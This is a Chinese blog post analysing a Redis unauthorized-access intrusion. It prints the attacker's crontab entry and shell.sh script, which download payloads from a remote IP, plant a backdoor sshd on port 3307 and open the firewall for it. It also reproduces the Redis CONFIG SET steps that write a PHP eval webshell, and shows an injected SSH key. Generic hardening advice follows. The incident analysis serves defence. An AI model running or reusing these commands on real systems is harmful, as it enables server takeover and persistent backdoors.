入侵事件

1、/etc/crontab文件被修改:
REDIS0006þ^@^@^Gcrackit@T


SHELL=/bin/sh
#* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh



ÿÉ6<95>GþÊN<8c>

2、shell.sh文件:
rm -rf shell.sh
wget -P /tmp http://104.223.72.167:8080/rebot
chmod 777 /bin/rebot
nohup bin/rebot > /tmp/bin/rebot.file 2>&1
rm -rf /etc/crontab
wget -P /etc http://104.223.72.167:8080/crontab
ln -sf /usr/stmp/sshd /tmp/su;/tmp/su -oPort=3307
iptables -I INPUT -p tcp --dport 3307 -i ACCEPT
/etc/rc.d/init.d/iptables save

入侵分析:
首先扫描端口,发现redis的默认服务端口6379,由于某些暴露在外面的redis没有设置密码,这样就可以直接登录。
1.修改crontab文档,这里建立一个tmp下的文档,
CONFIG SET dir /tmp/
CONFIG set dbfilename test.php
SET fuck "<?php @eval($_POST[123]);?>"
save
然后,去tmp目录查看,
ls /tmp/
dump.rdb  hist  hsperfdata_ngx  hsperfdata_root  log  test.php
发现已经生成,打开查看:
REDIS0006þ^@^@^Dfuck^[<?php @eval($_POST[123]);?>ÿ^WÙY©A
p^W

和原来的crontab文档进行对比,发现都有相同的头部:REDIS0006þ^@^@^D
2.crontab定时运行,下载shell文档到tmp下面


还有一个地方需要注意:
root目录下的.ssh/authorized_keys
  打开发现:
     REDIS0006þ^@^@^Gcrackit^G






^@^CqweA<9f>

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm8glBB05kyIgRXCs8WuRwV5zLVU0LjzL1eFl70hIj0/raIl1RxCMrm6u7+fLjxEgoaCiuoNrL+gb+9Z6uBPhIdF3Q61WLuNB/nQ83S3o3d6gW9urkYU3/jKO1y7RZ+E/3u5GNrFsdMl4xaLatjcj7KSU6WJo4c90OSu0RhzZLS2jWKOLiWF3JSwoKTXouAfcDebhyt97D/HF/mZsIIG9wZVVZVoqFpm/RSZvsYvDdICy8hk3osVXW5rSw0vpB9uWBSQBfiJ5/eKZBeKSkJE8s3T75/NFrrr0n6A3h7fODsjUTIOYjOcFqAyrzdBG59eo441MaqB4nThGk+007IACZw== root@dedi10243.hostsailor.com


ÿÛ6·3ëTDß



又是典型的redis文件的格式!
在ssh的目录下面还发现了其它遗留的文件:


在/etc/ssh下也有相关的文档:
authorized_keys  ssh_config   ssh_host_dsa_key      ssh_host_key      ssh_host_rsa_key
moduli           sshd_config  ssh_host_dsa_key.pub  ssh_host_key.pub  ssh_host_rsa_key.pub
vi authorized_keys
发现:
REDIS0006þ^@^@^S1601251638050293014


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
针对这个系统入侵事件以及操作系统口令的安全问题,以下是一些护网的建议步骤: 1. 紧急处理:首先,立即修改操作系统的口令,将其更改为复杂且不易被猜测的密码。确保只有授权人员知晓新密码,并通知他们及时更新自己的登录凭证。 2. 禁用可疑账户:禁用可疑账户,以防止进一步的入侵和损害。同时,审查其他账户和用户组,确保只有必要的账户存在并具有适当的权限。 3. 升级系统:确保您的操作系统是最新版本,并及时应用安全补丁。这有助于修复已知漏洞,并提高系统的安全性。 4. 安全审计:对受影响的服务器进行全面的安全审计,包括日志分析、文件完整性检查和网络流量监控等。这有助于发现潜在的攻击痕迹和异常行为。 5. 强化防火墙和访问控制:配置和优化防火墙规则,限制不必要的入站和出站流量。同时,加强访问控制,限制对服务器的访问,并使用双因素身份验证来提高安全性。 6. 加密通信:使用加密协议(如SSH)来远程访问服务器,确保敏感数据在传输过程中的安全性。 7. 安全培训:加强运维人员和员工的安全培训,提高其对安全威胁的认识和识别能力。教育他们如何使用强密码、避免社交工程攻击以及响应安全事件等。 以上是一些基本的护网建议,但请注意,每个组织的网络环境和需求可能不同,因此建议根据具体情况采取适当的安全措施,并定期评估和更新安全策略。如果需要更详细的指导或技术支持,建议咨询专业的网络安全团队或安全顾问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值